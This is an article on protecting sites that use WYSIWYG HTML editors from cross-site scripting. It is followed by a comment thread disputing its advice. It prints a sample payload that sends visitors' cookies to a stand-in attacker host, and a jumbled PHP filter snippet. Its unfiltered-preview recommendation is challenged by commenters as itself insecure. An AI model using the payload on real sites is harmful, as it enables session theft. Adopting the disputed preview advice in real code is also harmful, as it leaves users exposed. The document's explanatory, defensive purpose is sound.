HTML Editors
HTML editors are special form fields that allow Web site users to visually edit (WYSIWYG) rich text content formatted with HTML tags. HTML editors are powerful, but without proper security care, sites may be abused.
The W3C HTML standards do not support HTML editors explicitly, but it has been a while since either Internet Explorer, Mozilla family browsers and other browsers start coming with built-in extensions that implement HTML editors.
There are already several packages, like FCKEditor, TinyMCE, Xinha, etc., that take advantage of these extensions to provide browser independent solutions to integrate HTML editors in form based Web pages.
Cross-site scripting: XSS
HTML editors are great. However, care must be taken to avoid security abuses. An application that uses HTML editors, expects that the submitted HTML content comes correctly formatted and well-formed. That happens when real users use real browsers to edit the content.
However, an attacker may create a program that pretends to be a real browser and submit specially crafted HTML with Javascript that may open security holes.
One of the most common types of attack is known as cross-site scripting – XSS. This kind of attack consists in submitting HTML with Javascript code that may be used to send to another site the cookies that a browser is sending to the current site.
Consider for instance the following HTML excerpt with malicious JavaScript:
<script>;
document.write('<script src="http://www.abuser.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>
If an attacker submits HTML like this, for instance to publish an article, and the site accepts it without discarding the harmful Javascript code, when the article gets published the site cookies of all users that access the article page will be sent to the abuser site.
The problem is that cookies are often used as session identifiers of logged in users. If somebody steals the cookies that your browser uses to access a domain, that person may be able to access the same site on your behalf and abuse from the privileges that you have.
Depending on what each site provides, the consequences can be catastrophic. Imagine if you are accessing an e-commerce site that stores information about your credit card and displays it in your profile pages. An attacker may steal that information and cause you financial troubles.
Of course the security of most e-commerce sites is not so weakly implemented, but you can always imagine myriad of situations on which a cross-site scripting exploits may cause major headaches.
Avoiding XSS security attacks
To avoid the problem, first you need to detect when it is happening, and second do something about it.
To detect when the problem is happening, you need to somehow parse HTML document and locate unsafe HTML constructs. That includes not only <script> tags, but also other exploitable tags and attributes that trigger Javascript execution, like for instance event handling attributes such as onload, onclick, etc..
As you may imagine, detecting all circumstances that may allow eventual XSS exploits is not an easy task. Fortunately, there are some ready to use solutions provided by people that have been working on this subject for while.

One of the most interesting solutions I have came across is the PHP Input Filter class. It was developed by Daniel Morris with contributions from Gianpaolo Racca, Ghislain Picard, Marco Wandschneider, Chris Tobin and Andrew Eddie.
This class was nominated for the PHP Programming Innovation Award edition of May 2005 of the PHPClasses site.
It takes a string of HTML data as input and returns the HTML cleaned from harmful tags attributes.
Here is an example of usage:
<?php// include class file
require_once("class.inputfilter_clean.php");if(IsSet($_POST["input"]))
// process input $result = $myFilter->process($_POST["input"]); } ?>
{ // Create the class object $myFilter = new InputFilter();
Do not let an attacker realize he failed
If the cleaned HTML is different from the original, your site is being attacked. In that case you can do different things.
I recommend that you pretend that the attack was not detected. Just present the same pages as if the content was accepted. The reason for this is to not let the attacker determine whether he succeeded or failed.
What happens is that it is very hard if possible at all provide 100% full proof solutions. You may implement security measures that protect you from types of attacks that are known today. But in the future there may always be new forms of attack for which you are not prepared yet.
If you expose any information that may let the attacker detect whether the spoofed HTML was filtered or not, you may be helping him to figure how your filter works and how to bypass it with a different attack method.
Lets say you have for instance a site that publishes articles submitted by untrusted users. If your site exhibits a preview of the article during the submission, do not use the filtered HTML to display the preview.
Use only the original HTML. If the attacker is attempting an XSS attack, no harm will happen because only the cookies of the attacker session will be sent to the remote attacker site.
When the harmful HTML is finally submitted, you can discard the submission. Just present the same successful submission message, as if the article was accepted. It is also interesting to log attack attempts for further study.

Comments
I toke a short look in Daniel's class and saw that it's based on a blacklist filter. I think a white list filter is easier maintainable but may difficult to realize together with an html editor.
Another class that takes the white list tags and blacklist attributes was just released by Frederic Minne.
<a href="http://www.phpclasses.org/htmlsanitizer">http://www.phpclasses.org/htmlsanitizer</a>
Anyway, keep in mind that all these classes only address the types of exploits we know today that could work on today's browsers. In the future new XSS exploits may be discovered. Filtering solutions like these are much better than nothing, but they may need to be updated to take care of future exploits.
First of all, I'm glad that Zend's giving XSS a bit of recognition. Any form of XSS is an extremely serious web-vulnerability, and is an especially troublesome problem to fix.
However, by displaying submitted HTML in preview mode without filtering, you introduce a Type 1 XSS vulnerability into your website, where with a little bit of social engineering, it is entirely possibly to trick an unsuspecting user into "previewing" the malicious HTML. Sorry, but security by obscurity is not going to work, especially if you're using an open-source filter library.
The recommended HTML filter class, PHP Input Filter, has several vulnerabilities in it. While not XSS, they are just a serious. The largest one is the fact that the class is unable to detect when there is an unclosed tag in the layout (for example, try inserting a <b> tag without the corresponding closing tag). kses, another HTML filter, has a similar problem, and you'll need to implement tag-balancing code to get around the trouble should you choose to stick with the library.
Predictably, I strongly recommend that users who need to accept rich HTML documents from WYSIWYG editors to use my library, HTML Purifier <http://hp.jpsband.org/>
As for your comment regarding displaying the preview, maybe the article is not clear enough, but the recommendation is to "show" the preview only to the submitter. The article also suggests to discard the article all together and pretend that it was accepted if it is detected that it contains exploits. So no user will see HTML documents with XSS exploits.
Regarding the vulnerabilities that you detected in the PHP Input Filter class, it would be useful if you could post an article in the support forum of that class, so the author can comment and eventually fix the class.
Finally, regarding your HTML Purifier, it seems quite extensive. Maybe you would like to consider submitting the whole package or at least part to the PHPClasses site, so you can benefit from more exposure to your work and the thousands of users that visit the site can try it and provide you more feedback.
Yep, that's correct. The problem is that you can't be absolutely certain that the submitter is the attacker. Without a nonce, using CSRF all a user has to do is visit a malicious page and they could post arbitrary data on another website. If the preview function allows XSS, you put users at risk. It's a bit tricky to wrap your head around, but CSRF has definitely been troublesome for websites like Digg in the past.
> The article also suggests to discard the article all together and pretend that it was accepted if it is detected that it contains exploits. So no user will see HTML documents with XSS exploits.
It's an interesting idea, but I wouldn't personally due it by virtue of the fact that it's confusing! I get annoyed enough when mod_security intervenes during application security testing and spits out a mysterious 503 error.
> Regarding the vulnerabilities that you detected in the PHP Input Filter class, it would be useful if you could post an article in the support forum of that class, so the author can comment and eventually fix the class.
I'm not certain the class is still being maintained. The last update was a year and a half ago, and the site that originally hosted the code actually disappeared off the web, although the PHP Classes page remains. Anyway, there are better "bad" solutions out there, such as PEAR's HTML_Safe class, so if you're not willing to roll an HTML Purifier solution, you can always go with that one.
> Finally, regarding your HTML Purifier, it seems quite extensive.
It is. In fact, that's the primary complaint with my library. ;-) But HTML is a complex datatype, so the complexity is all necessary.
> Maybe you would like to consider submitting the whole package or at least part to the PHPClasses site, so you can benefit from more exposure to your work and the thousands of users that visit the site can try it and provide you more feedback.
I've had a bad experience with PHPClasses in the past, and I'm not so fond of the fact that they require you to register in order to download certain classes (really, mostly all of them, although it's not 100%). Still, it may provide some good exposure, so I'll consider it.
This is not to say that evangelism in favor of HTML Purifier is discouraged. In fact, it would be greatly appreciated. HTML Purifier is slowly gaining momentum, but I haven't really invested the time to go on a "marketing blitz" for the library. Go figure... :-/
Anyway, couldn't eventual CSRF triggered abuses be avoided if the article preview would only be displayed when the referrer URL is of the same site?
The idea of pretending that the article with XSS exploits was accepted is precisely to confuse the attacker and tire him until he gives up and go attack an easier site! ;-)
As for your package being extensive, that is not a problem unless it is too slow for regular usage.
Regarding the PHPClasses site, there is a bit of misunderstanding. The login requirement to download is not mandatory. Each author can decide whether their package files are to be made available without login or not.
The detail is that when files are made available for download without requiring login, the site does not keep track of who downloaded each package. In that case, the package downloads are not accounted and the package may not appear in the top download charts, which is a bid deal for some authors due to natural ego related reasons.
Also, when you update a package the site can send package update alerts to the users that downloaded the package. That can only happen when the site keeps track of who downloaded each package.
Currently the only problem for distributing packages with many files is that each file needs to be uploaded and described individually. In the future remote CVS/Subversion bulk import will be made available, but it will take time. So, for now, it would a lot of work for you to submit the whole package.
This sounds inherently insecure to me. Though I don't know exactly how, couldn't headers be forged without a user knowing? Or an XSS attack routed through the form itself?
Unfiltered previews won't accomplish much in the long run, and it introduces a new set of problems. The attacker will eventually realize the apparently-successful XSS attacks don't work, and the testing process will be adjusted accordingly. Then you're back to square one. If users are allowed to edit their HTML by hand, the preview is incorrect (and useless) if they've made an HTML mistake.
If the referer does not match the real site domain, the idea is to not show the preview at all regardless of whether the form contains legitimate HTML generated by the HTML editor or HTML with XSS.
It is irrelevant whether the attacker figures that the apparently successful XSS attacks may never succeed. The point here is not help him to discover when he succeeded bypassing the HTML filters with new techniques.
As for hand edited HTML that is outside the scope of this article, which is about using HTML editors.
If you to allow HTML hand editing you can validate the HTML and tell the user there was a validation error, regardless if there are any XSS attacks or not. That way the preview only appears when the HTML is valid.